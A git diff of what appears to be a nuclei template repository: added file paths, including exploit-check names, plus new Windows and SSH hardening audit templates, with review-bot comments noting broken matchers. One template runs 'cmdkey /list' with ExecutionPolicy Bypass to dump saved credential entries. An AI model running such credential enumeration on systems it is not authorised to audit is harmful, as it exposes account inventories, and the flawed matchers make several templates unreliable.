./poc/other/multipurpose-1e7fa5b1ad541907b1348192f97e6162.yaml ./poc/other/multipurpose-block-c76d49de417bda8e5a8ec87823f6f2ea.yaml ./poc/other/multipurpose-block.yaml @@ -96296,9 +96480,11 @@ ./poc/other/nessus-panel-9020.yaml ./poc/other/nessus-panel.yaml ./poc/other/nessus.yaml +./poc/other/net-multi-step.yaml ./poc/other/netapp-data-ontap.yaml ./poc/other/netapp-netcache-appliance.yaml ./poc/other/netartmedia-real-estate-portal.yaml +./poc/other/netbios-disabled.yaml ./poc/other/netbotz-network-monitoring-device.yaml ./poc/other/netbox.yaml ./poc/other/netcom-ngfw.yaml 
@@ -96372,6 +96558,8 @@ ./poc/other/netweaver.yaml ./poc/other/netweaver_development_infrastructure.yaml ./poc/other/netwin-surgemail.yaml +./poc/other/network-discovery-public-enabled.yaml +./poc/other/network-port.yaml ./poc/other/network-publisher-08150a918a03f0e1752e603684201c24.yaml ./poc/other/network-publisher-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/network-publisher-e61ff719b0d272a313f2577b9c7fd6fe.yaml @@ -96517,6 +96705,7 @@ ./poc/other/newsletters-lite-b0cc4281fd93ff1b522600f1f3879e43.yaml ./poc/other/newsletters-lite-b2a597d15cc95893a967a720d7dd6cd0.yaml ./poc/other/newsletters-lite-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml ./poc/other/newsletters-lite-eb6c1a0a90dd146ae8395aa9410246b4.yaml ./poc/other/newsletters-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/newsletters-lite-plugin.yaml @@ -96918,6 +97107,7 @@ ./poc/other/ns-asg.yaml ./poc/other/ns-coupon-to-become-customer-7937a8d2d4473985a3f546f6a2747fbf.yaml ./poc/other/ns-coupon-to-become-customer.yaml +./poc/other/ns.yaml ./poc/other/nsasg-arbitrary-file-read.yaml ./poc/other/nsc-d9efe976440ba902e2d8d4a9e3c771cc.yaml ./poc/other/nsc.yaml @@ -96954,6 +97144,7 @@ ./poc/other/nuance-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/nuance-theme.yaml ./poc/other/nuance.yaml +./poc/other/nuclei-flow-dns-prefix.yaml ./poc/other/nuclei-openssl.yaml ./poc/other/nuclei.yaml ./poc/other/nuclei_template.yaml 
@@ -99044,7 +99235,9 @@ ./poc/other/post-snippets.yaml ./poc/other/post-state-tags-5381d68755a15a855c024e83bb2aa0cb.yaml ./poc/other/post-state-tags.yaml +./poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml ./poc/other/post-status-notifier-lite-0d82f27fd581534cd044b87e17d81bed.yaml +./poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml ./poc/other/post-status-notifier-lite-c4afe69796283be00be766e93c696a9d.yaml ./poc/other/post-status-notifier-lite.yaml ./poc/other/post-teaser-09875439e46c3ed63c2a03f3c27e609a.yaml @@ -99264,6 +99457,7 @@ ./poc/other/premium-addons-for-elementor-86a061cf263c6244aed3c4d36713ada4.yaml ./poc/other/premium-addons-for-elementor-89c8ef165ad8eb1f38be461aab6abce0.yaml ./poc/other/premium-addons-for-elementor-900e2749f372068583dfd8bcadfb17a9.yaml +./poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml ./poc/other/premium-addons-for-elementor-b149032d631895734a90fe70afaff5d3.yaml ./poc/other/premium-addons-for-elementor-ba3a723e91e3a4f9f08a70b3aaec11bc.yaml ./poc/other/premium-addons-for-elementor-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -99422,6 +99616,7 @@ ./poc/other/private-files.yaml ./poc/other/private-only-d6d91f6cec50e66c8aa8b7d27ce9d5ae.yaml ./poc/other/private-only.yaml +./poc/other/privesc-agetty.yaml ./poc/other/privx-panel.yaml ./poc/other/pro-links-maintainer-dev-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/pro-links-maintainer-dev.yaml @@ -99695,6 +99890,7 @@ ./poc/other/prtg-workflow.yaml ./poc/other/prtg_network_monitor.yaml ./poc/other/prvpl.yaml +./poc/other/ps1-snippet.yaml ./poc/other/psmessage.yaml ./poc/other/psstaudio.yaml ./poc/other/pt-elementor-addons-lite-14963541d2314ab58423512ed4bb3c81.yaml 
@@ -99786,6 +99982,10 @@ ./poc/other/putty-phish.yaml ./poc/other/pwgrandom-1aa979b3cc5c2a691e4af675add989c2.yaml ./poc/other/pwgrandom.yaml +./poc/other/py-file.yaml +./poc/other/py-interactsh.yaml +./poc/other/py-nosig.yaml +./poc/other/py-snippet.yaml ./poc/other/py_settings-py.yaml ./poc/other/py_settings.yaml ./poc/other/pygopherd.yaml @@ -100035,6 +100235,7 @@ ./poc/other/quickswish.yaml ./poc/other/quilium-panel.yaml ./poc/other/quitterpl.yaml +./poc/other/quivr-panel.yaml ./poc/other/quixplorer.yaml ./poc/other/quiz-expert-fdc3f1ee4d1b437017771844d1ce9c56.yaml ./poc/other/quiz-expert.yaml @@ -100284,9 +100485,11 @@ ./poc/other/ravpage.yaml ./poc/other/raw-get-query.yaml ./poc/other/raw-get.yaml +./poc/other/raw-path-single-slash.yaml ./poc/other/raw-path-trailing-slash.yaml ./poc/other/raw-payload.yaml ./poc/other/raw-post-body.yaml +./poc/other/raw-unsafe-path-single-slash.yaml ./poc/other/raw-unsafe-path.yaml ./poc/other/raw-unsafe-request.yaml ./poc/other/ray-dashboard.yaml @@ -101623,6 +101826,7 @@ ./poc/other/sam-pro-lite-138765af8c050b523b31a472b620b032.yaml ./poc/other/sam-pro-lite-1b374195caca5f994c60dff13d949a09.yaml ./poc/other/sam-pro-lite.yaml +./poc/other/same-address.yaml ./poc/other/sandu-oa.yaml ./poc/other/sangar-slider-lite-480a53835ea6b15438ece6e1d045bf8a.yaml ./poc/other/sangar-slider-lite.yaml @@ -102196,6 +102400,7 @@ ./poc/other/setka-editor.yaml ./poc/other/setlistfm.yaml ./poc/other/seur-1119763f95fdfb714e33317ed8a4290b.yaml +./poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml ./poc/other/seur-a3b06a9eaef8c9e7e76c1f6ce446151f.yaml ./poc/other/seur.yaml ./poc/other/sexworker.yaml @@ -102210,6 +102415,7 @@ ./poc/other/sf-booking-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/sf-booking-theme.yaml ./poc/other/sf-booking.yaml +./poc/other/sf2-profiler-exploit.yaml ./poc/other/sfd.yaml ./poc/other/sfos.yaml ./poc/other/sg-cachepress-01dd259dcab49f05580ac3bdd6414ced.yaml 
@@ -102543,6 +102749,7 @@ ./poc/other/show-hidecollapse-expand.yaml ./poc/other/show-posts-f6245da7518f9c1f311e5b92f64000b1.yaml ./poc/other/show-posts.yaml +./poc/other/show-version-warning.yaml ./poc/other/showbizpro-44831c2b287d25e0f0455d52b6d7b909.yaml ./poc/other/showbizpro.yaml ./poc/other/showdoc.yaml @@ -103619,6 +103826,7 @@ ./poc/other/sniplets-12a66d289f1d982a5410630994976bc7.yaml ./poc/other/sniplets-a33b18606f7c7c0e57e6c2973f66d288.yaml ./poc/other/sniplets.yaml +./poc/other/sns-public-subscribe-access.yaml ./poc/other/sns-topic-public-accessible.yaml ./poc/other/so-audible-25be1b113676ff29fdf97c563dea39b0.yaml ./poc/other/so-audible-400686882bda2d0b4d321441b1171f25.yaml @@ -104145,6 +104353,9 @@ ./poc/other/st-daily-tip.yaml ./poc/other/st_newsletter-06d1c7e09e9834aed347b62ce7221b3c.yaml ./poc/other/st_newsletter.yaml +./poc/other/stack-notification-disabled.yaml +./poc/other/stack-policy-not-inuse.yaml +./poc/other/stack-termination-disabled.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-290415cadef9c19a55802d0694d0c4ba.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-6e9e7493f4b83565fb4c7caa6bafc3ca.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-ccca2f262821eaf2767551efac129b45.yaml @@ -104419,6 +104630,7 @@ ./poc/other/streaming_engine.yaml ./poc/other/streamlabs.yaml ./poc/other/streampipes.yaml +./poc/other/streamweasels-kick-integration-772ed0ffd8d710c91969af2e2067e767.yaml ./poc/other/streamweasels-twitch-integration-9c67b609f8fb8e89d8e70928bfcc57bf.yaml ./poc/other/streamweasels-twitch-integration-a2ec7a94d1bb55c0619cc15a585a4607.yaml ./poc/other/streamweasels-twitch-integration-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -104426,6 +104638,7 @@ ./poc/other/streamweasels-twitch-integration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/streamweasels-twitch-integration-plugin.yaml ./poc/other/streamweasels-twitch-integration.yaml +./poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml ./poc/other/strict-transport-security.yaml ./poc/other/stridercd-panel.yaml ./poc/other/striking-r-326c8bdf105c72fe7da4201f851de1ed.yaml @@ -105231,6 +105444,7 @@ ./poc/other/tencentcloud-cos-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tencentcloud-cos-plugin.yaml ./poc/other/tencentcloud-cos.yaml +./poc/other/tenda-fh451-stack-overflow.yaml ./poc/other/tenda-leakage.yaml ./poc/other/tenda-panel.yaml ./poc/other/tengweioa.yaml @@ -106385,6 +106599,7 @@ ./poc/other/tx-onepager.yaml ./poc/other/txt-fingerprint-10863.yaml ./poc/other/txt-fingerprint.yaml +./poc/other/txt.yaml ./poc/other/typebot-29c237607aa8d82c64f2f64dee2b3cb5.yaml ./poc/other/typebot-d46f8d409dfd4cf2ebe7a24205b8fb3e.yaml ./poc/other/typebot.yaml @@ -107030,6 +107245,7 @@ ./poc/other/unnamed.yaml ./poc/other/unomi.yaml ./poc/other/unprotected-broadcast.yaml +./poc/other/unquoted-service-pathcheck.yaml ./poc/other/unrestricted-admin-ports.yaml ./poc/other/unrestricted-sg-ingress-dns-port.yaml ./poc/other/unrestricted-sg-ingress-rdp-port.yaml @@ -107039,6 +107255,7 @@ ./poc/other/unsafe-inline-check.yaml ./poc/other/unseen-blog-5a4a9c89ee218494ff46b45947b7f600.yaml ./poc/other/unseen-blog.yaml +./poc/other/unsigned.yaml ./poc/other/unsplash.yaml ./poc/other/untangle-admin-setup.yaml ./poc/other/untappd.yaml 
@@ -111908,6 +112125,7 @@ ./poc/remote_code_execution/customize-my-account-for-woocommerce-c3e32bfa33102ab45cd2008574a6e8e9.yaml ./poc/remote_code_execution/customize-my-account-for-woocommerce.yaml ./poc/remote_code_execution/cve_rce2-1(1).yaml +./poc/remote_code_execution/cyberpanel-rce.yaml ./poc/remote_code_execution/dahua-dss-zhihuixiaoyuan-s2_45-rce.yaml ./poc/remote_code_execution/dahua-eims-capture-handle-rce.yaml ./poc/remote_code_execution/dahua-icc-fastjson-rce.yaml @@ -118348,7 +118566,11 @@ ./poc/sql/CVE-2024-0972-d643db18054b1dd86be768803ada8c1e.yaml ./poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml ./poc/sql/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml +./poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml +./poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml +./poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml ./poc/sql/CVE-2024-10343-4b62a3038a6fc336914f3ddb9e620492.yaml +./poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml ./poc/sql/CVE-2024-10402-d19daccb93672a4dbbaf6e7359c6a5a0.yaml ./poc/sql/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml ./poc/sql/CVE-2024-1047-68db58e698228b42f923e1452fb395bc.yaml @@ -118987,6 +119209,7 @@ ./poc/sql/CVE-2024-7859-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml ./poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml +./poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8104-ce7e2be47ca5e025bb553db2616e0460.yaml ./poc/sql/CVE-2024-8107-9941ef9f12828b3aa10278ae412dbb8d.yaml 
@@ -119031,7 +119254,9 @@ ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml ./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml +./poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml +./poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml ./poc/sql/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml @@ -119963,6 +120188,7 @@ ./poc/sql/cf7-styler-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/cf7-styler-for-divi-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/cf7-summary-and-print-1e30da773d5bdb41f0a7df4f71929e10.yaml +./poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml ./poc/sql/cf7-zoho-2e1ea1c47ee2f1626d1949d9ddbd12f4.yaml ./poc/sql/cforms-c00364338071c029d11801e6d6d843db.yaml ./poc/sql/cforms2-db9b68f1ee2b9be12c99bce089f4636b.yaml @@ -121755,6 +121981,7 @@ ./poc/sql/motors-car-dealership-classified-listings-fd851a2259dbf2f2b432d6ab6e9ea4b7.yaml ./poc/sql/move-addons-1167b2db2baf9e94dd4a44b571b981f5.yaml ./poc/sql/move-addons-8fc0bccfb14c6d1787dbecb39830ce5d.yaml +./poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml ./poc/sql/moveto-154cdc35f396e8fc20508edb7d0555dc.yaml ./poc/sql/mp-timetable-c7a9ef628b1154c47dbf0b3fd366d29d.yaml ./poc/sql/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml 
@@ -122446,6 +122673,7 @@ ./poc/sql/royal-elementor-addons-7b9095dbb3bfc8278a3c330ef98ba798.yaml ./poc/sql/royal-elementor-addons-89f1bb61464e1dbfe60d2e3cb04465f0.yaml ./poc/sql/royal-elementor-addons-97b685b9e6a886b570db7f62e08ed1d5.yaml +./poc/sql/royal-event-management-system-sqli.yaml ./poc/sql/rss-feed-post-generator-echo-b13d377a9dbca142b213f79ffe472808.yaml ./poc/sql/rss-import-e77e3db079e6a03ccc6f7e08b07dc4a1.yaml ./poc/sql/rss-includes-pages-65db39b697a6c06037fb6e4114879974.yaml @@ -124194,6 +124422,7 @@ ./poc/sql/xdcms-sqli-11667.yaml ./poc/sql/xdcms-sqli.yaml ./poc/sql/xhanch-my-twitter-13afd7959bdba431246ec18eac06eb55.yaml +./poc/sql/xhibiter-nft-sqli.yaml ./poc/sql/xo-event-calendar-4141db509b6d506a88a5f846b22304e8.yaml ./poc/sql/xray-clandbeta.yaml ./poc/sql/xserver-migrator-0ba803f5ae9bddb872117dcecb6a9fcd.yaml @@ -125035,6 +125264,7 @@ ./poc/sql_injection/realor_index_agent_getapp_sqli.yaml ./poc/sql_injection/realor_index_dologin_sqli.yaml ./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml +./poc/sql_injection/royal-event-management-system-sqli.yaml ./poc/sql_injection/run_id_SQL.yaml ./poc/sql_injection/seaCMS-sqli.yaml ./poc/sql_injection/seacms-dmku-sqli.yaml @@ -125269,6 +125499,7 @@ ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml ./poc/sql_injection/xdcms-sqli.yaml +./poc/sql_injection/xhibiter-nft-sqli.yaml ./poc/sql_injection/xunrui-cms-sqli.yaml ./poc/sql_injection/yapi-sql-inject.yaml ./poc/sql_injection/yeswiki-sql.yaml 
@@ -125370,7 +125601,12 @@
 ./poc/ssh/cowrie-ssh-honeypot-detect.yaml
 ./poc/ssh/cowrie-ssh-honeypot-detection.yaml
 ./poc/ssh/deprecated-sshv1-detection.yaml
+./poc/ssh/disable-ssh-forwarding.yaml
+./poc/ssh/disable-ssh-protocol-1.yaml
+./poc/ssh/enable-ssh-privilege-separation.yaml
 ./poc/ssh/iam-ssh-keys-rotation.yaml
+./poc/ssh/limit-ssh-group.yaml
+./poc/ssh/limit-ssh-users-access.yaml
 ./poc/ssh/obsolete-ssh-version.yaml
 ./poc/ssh/openssh-detect.yaml
 ./poc/ssh/openssh-detect.yml
@@ -125380,6 +125616,7 @@
 ./poc/ssh/openssh-username-enumeration.yaml
 ./poc/ssh/openssh5.3-detect.yaml
 ./poc/ssh/rsshub-detect.yaml
+./poc/ssh/ssh-audit.yaml
 ./poc/ssh/ssh-auth-methods.yaml
 ./poc/ssh/ssh-authorized-keys-1.yaml
 ./poc/ssh/ssh-authorized-keys-10523.yaml
@@ -125389,6 +125626,8 @@
 ./poc/ssh/ssh-cbc-mode-ciphers.yaml
 ./poc/ssh/ssh-default-logins.yaml
 ./poc/ssh/ssh-diffie-hellman-logjam.yaml
+./poc/ssh/ssh-ip-whitelist.yaml
+./poc/ssh/ssh-key-auth-required.yaml
 ./poc/ssh/ssh-known-hosts-1.yaml
 ./poc/ssh/ssh-known-hosts-10524.yaml
 ./poc/ssh/ssh-known-hosts-2.yaml
@@ -128008,6 +128247,7 @@
 ./poc/web/webtrees-install.yaml
 ./poc/web/webtrust-cert.yaml
 ./poc/web/webui-aria2.yaml
+./poc/web/webui-login.yaml
 ./poc/web/webui-rce-11170.yaml
 ./poc/web/webui-rce-11171.yaml
 ./poc/web/webui-rce-11172.yaml
@@ -135427,6 +135667,8 @@
 ./poc/wordpress/wpc-composite-products.yaml
 ./poc/wordpress/wpc-grouped-product-4128a97ef233a24550e743d03196f561.yaml
 ./poc/wordpress/wpc-grouped-product.yaml
+./poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml
+./poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml
 ./poc/wordpress/wpcal-1e492620e8a7e81b2eec48aa4fd7a9b8.yaml
 ./poc/wordpress/wpcal.yaml
 ./poc/wordpress/wpcalc-74489dc147c707bfca57f928245a54c8.yaml
diff --git a/poc/auth/credential-guard-disabled.yaml b/poc/auth/credential-guard-disabled.yaml
new file mode 100644
index 0000000000..c0ba03763e
--- /dev/null
+++ b/poc/auth/credential-guard-disabled.yaml
@@ -0,0 +1,38 @@
+id: credential-guard-disabled
+
+info:
+ name: Credential Guard Not Enabled
+ author: princechaddha
+ severity: high
+ description: Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft.
+ impact: |
+ Disabling Credential Guard reduces protection against modern credential theft techniques.
+ remediation: |
+ Enable Credential Guard to enhance security against credential theft.
+ tags: credential-guard,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "AvailableSecurityProperties"
+
+ - type: word
+ words:
+ - "Credential Guard"
+ negative: true
diff --git a/poc/auth/disable-empty-password.yaml b/poc/auth/disable-empty-password.yaml
new file mode 100644
index 0000000000..fd2531db63
--- /dev/null
+++ b/poc/auth/disable-empty-password.yaml
@@ -0,0 +1,24 @@
+id: disable-empty-password
+
+info:
+ name: Disable SSH Empty Password
+ author: pussycat0x
+ severity: info
+ description: |
+ Disabling SSH logins with empty passwords significantly enhances the security of your server.
+ remediation: |
+ Change it to : PermitEmptyPasswords no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://docs.datadoghq.com/security/default_rules/xccdf-org-ssgproject-content-rule-sshd-disable-empty-passwords/
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "PermitEmptyPasswords no"
+ negative: true
\ No newline at end of file
diff --git a/poc/auth/disable-root-login.yaml b/poc/auth/disable-root-login.yaml
new file mode 100644
index 0000000000..071b31c1f4
--- /dev/null
+++ b/poc/auth/disable-root-login.yaml
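Review bot: The second matcher can never fail, because `Get-CimInstance Win32_DeviceGuard` prints numeric properties (`SecurityServicesRunning`, `AvailableSecurityProperties`) and the literal string "Credential Guard" does not occur in its output, so the negative matcher on `"Credential Guard"` is satisfied on every host and the template reports a finding wherever the class exists, including hosts where Credential Guard is running. Credential Guard is signalled by the value 1 in `SecurityServicesRunning`; test that directly with a single matcher, e.g. `source: if ((Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning -contains 1) { "Credential Guard running" } else { "Credential Guard not running" }` and `words: - "Credential Guard not running"`. The args list also omits `-File`, which the sibling template get-stored-credentials-cmdkey passes; one convention should be used unless the omission is deliberate.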
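Review bot: With `extensions: all` and a negative word matcher, every file under the scan target that does not contain `PermitEmptyPasswords no` is reported, so the template fires on essentially everything except a hardened sshd_config, and a commented `#PermitEmptyPasswords no` still satisfies the word match. Matching the insecure setting positively on an uncommented line avoids both problems: `- type: regex` with `regex: - "(?m)^\\s*PermitEmptyPasswords\\s+yes"`; OpenSSH defaults the directive to `no` when it is absent, so absence is not a finding. hide-last-login-information in this commit uses the same negative-matcher-on-all-files construction; because `PrintLastLog` defaults to `yes`, that one does need a negative check, but it should be run against the sshd configuration file rather than every file in the target.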
@@ -0,0 +1,23 @@
+id: disable-root-login
+
+info:
+ name: Disable SSH Root Login
+ author: pussycat0x
+ severity: info
+ description: |
+ Disabling direct root login can help prevent unauthorized users from gaining full control over your system.
+ remediation: |
+ Change it to : PermitRootLogin no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.tecmint.com/disable-or-enable-ssh-root-login-and-limit-ssh-access-in-linux/
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "PermitRootLogin yes"
\ No newline at end of file
diff --git a/poc/auth/get-stored-credentials-cmdkey.yaml b/poc/auth/get-stored-credentials-cmdkey.yaml
new file mode 100644
index 0000000000..add3f79a1e
--- /dev/null
+++ b/poc/auth/get-stored-credentials-cmdkey.yaml
@@ -0,0 +1,27 @@
+id: get-stored-credentials-cmdkey
+
+info:
+ name: Get Stored Credentials - cmdkey
+ author: pussycat0x
+ severity: high
+ description: |
+ The cmdkey /list command in Windows is used to list all the stored credentials on the system. These credentials can include saved usernames and passwords for network resources, websites, or remote computers
+ tags: code,windows,privesc,ps
+
+self-contained: true
+code:
+ - engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ - -File
+ pattern: "*.ps1"
+ source: |
+ cmdkey /list
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
diff --git a/poc/auth/hide-last-login-information.yaml b/poc/auth/hide-last-login-information.yaml
new file mode 100644
index 0000000000..49a07c2a0b
--- /dev/null
+++ b/poc/auth/hide-last-login-information.yaml
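Review bot: The word matcher `"PermitRootLogin yes"` also matches the commented stock line `#PermitRootLogin yes` that older OpenSSH packages ship, so a configuration whose effective value is the compiled-in default gets reported. Anchor the match to an uncommented directive instead: `- type: regex` with `regex: - "(?m)^\\s*PermitRootLogin\\s+yes"`. A positive match is harmless across `extensions: all`, but the intended target is still the sshd configuration file and the description should say which file to point the scan at.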
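Review bot: The template has an extractor but no matcher, so it emits the full `cmdkey /list` output (the target and user name of every saved credential) for every host it runs on, including hosts with nothing stored, and a `severity: high` result is indistinguishable from an empty listing without reading the output. Add a matcher so it reports only when credentials exist, e.g. `matchers: - type: word` with `words: - "Target:"`, and prefer a regex extractor for the `Target:`/`User:` lines over `response`, since the whole listing is sensitive inventory data that lands in scan reports. The `-File` argument here also differs from the other PowerShell templates in this commit (credential-guard-disabled, hyperv-enhanced-session-mode-enabled, lm-ntlmv1-authentication-enabled, null-session-allowed), which omit it; pick one convention.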
@@ -0,0 +1,24 @@
+id: hide-last-login-information
+
+info:
+ name: Hide SSH Last Login Information
+ author: pussycat0x
+ severity: info
+ description: |
+ Reduces Information Exposure: Users will no longer see the last login details when they log in, enhancing privacy.
+ remediation: |
+ Ensure the following line is present: : PrintLastLog no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209441
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "PrintLastLog no"
+ negative: true
\ No newline at end of file
diff --git a/poc/auth/http-preprocessor.yaml b/poc/auth/http-preprocessor.yaml
new file mode 100644
index 0000000000..795e86150b
--- /dev/null
+++ b/poc/auth/http-preprocessor.yaml
@@ -0,0 +1,17 @@
+id: http-preprocessor
+
+info:
+ name: Test Http Preprocessor
+ author: pdteam
+ severity: info
+
+http:
+ - raw:
+ - |
+ GET /?test={{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/auth/hyperv-enhanced-session-mode-enabled.yaml b/poc/auth/hyperv-enhanced-session-mode-enabled.yaml
new file mode 100644
index 0000000000..7159e65ecb
--- /dev/null
+++ b/poc/auth/hyperv-enhanced-session-mode-enabled.yaml
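Review bot: This template is a nuclei harness fixture (`author: pdteam`, name "Test Http Preprocessor") that matches any HTTP 200 and carries no tags or description, so it reports a finding against every live host if poc/auth is run as a scan set. It does not belong next to authentication audits; either drop it from the set or give it a `tags:` line and a `description:` stating it is a preprocessor self-test so it can be excluded by tag.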
@@ -0,0 +1,33 @@
+id: hyperv-enhanced-session-mode-enabled
+
+info:
+ name: Hyper-V Enhanced Session Mode Enabled
+ author: princechaddha
+ severity: medium
+ description: Determines if Hyper-V Enhanced Session Mode is enabled unnecessarily.
+ impact: |
+ Enabling Enhanced Session Mode unnecessarily can expose the virtual machine to additional risks by increasing attack surface.
+ remediation: |
+ Disable Enhanced Session Mode if not required.
+ tags: windows,hyperv,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ $enhancedSession = Get-VMHost | Select-Object -ExpandProperty EnhancedSessionTransportType
+ Write-Host "EnhancedSessionMode: $enhancedSession"
+
+ matchers:
+ - type: word
+ words:
+ - "EnhancedSessionMode: VMBus"
diff --git a/poc/auth/limit-maximum-authentication-attempts.yaml b/poc/auth/limit-maximum-authentication-attempts.yaml
new file mode 100644
index 0000000000..b3b2546e8b
--- /dev/null
+++ b/poc/auth/limit-maximum-authentication-attempts.yaml
@@ -0,0 +1,23 @@
+id: limit-maximum-authentication-attempts
+
+info:
+ name: Limit Maximum SSH Authentication Attempts
+ author: pussycat0x
+ severity: info
+ description: |
+ Reduces Brute-Force Attack Surface: Limiting the number of attempts prevents attackers from repeatedly guessing passwords.
+ remediation: |
+ Change it to : MaxAuthTries 3
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.tenable.com/audits/items/CIS_Amazon_Linux_2_v3.0.0_L1.audit:82ddb0bcc7ddfddaae3ec0b408ffb225
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "#MaxAuthTries"
\ No newline at end of file
diff --git a/poc/auth/lm-ntlmv1-authentication-enabled.yaml b/poc/auth/lm-ntlmv1-authentication-enabled.yaml
new file mode 100644
index 0000000000..1307ff37e5
--- /dev/null
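Review bot: The matcher treats `EnhancedSessionTransportType` equal to `VMBus` as "enabled", but that property names the transport (`VMBus` or `HvSocket`) and, as far as I can tell, reads `VMBus` whether or not Enhanced Session Mode is switched on; the enablement flag is the boolean `EnableEnhancedSessionMode` on the same `Get-VMHost` object. Check that instead: `$enabled = (Get-VMHost).EnableEnhancedSessionMode` / `Write-Host "EnhancedSessionMode: $enabled"` and match `"EnhancedSessionMode: True"`. On a host without the Hyper-V module `Get-VMHost` errors and nothing is printed, which is a silent pass; `-ErrorAction SilentlyContinue` plus an explicit "module not present" message would make that outcome visible.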
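Review bot: Matching the literal `#MaxAuthTries` flags the commented default line that the stock sshd_config ships, not the effective setting: a file with `#MaxAuthTries 6` followed by an explicit `MaxAuthTries 3` is reported, while a file with `MaxAuthTries 10` and no comment is not. Match the effective value instead, e.g. `- type: regex` with `regex: - "(?m)^\\s*MaxAuthTries\\s+([4-9]|[1-9][0-9]+)\\b"`. When the directive is absent OpenSSH applies its default of 6, which a content match cannot observe, so the description should state that limitation.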
+++ b/poc/auth/lm-ntlmv1-authentication-enabled.yaml
@@ -0,0 +1,32 @@
+id: lm-ntlmv1-authentication-enabled
+
+info:
+ name: LM and NTLMv1 Authentication Enabled
+ author: princechaddha
+ severity: high
+ description: Checks if LM and NTLMv1 authentication protocols are enabled, which are insecure.
+ impact: |
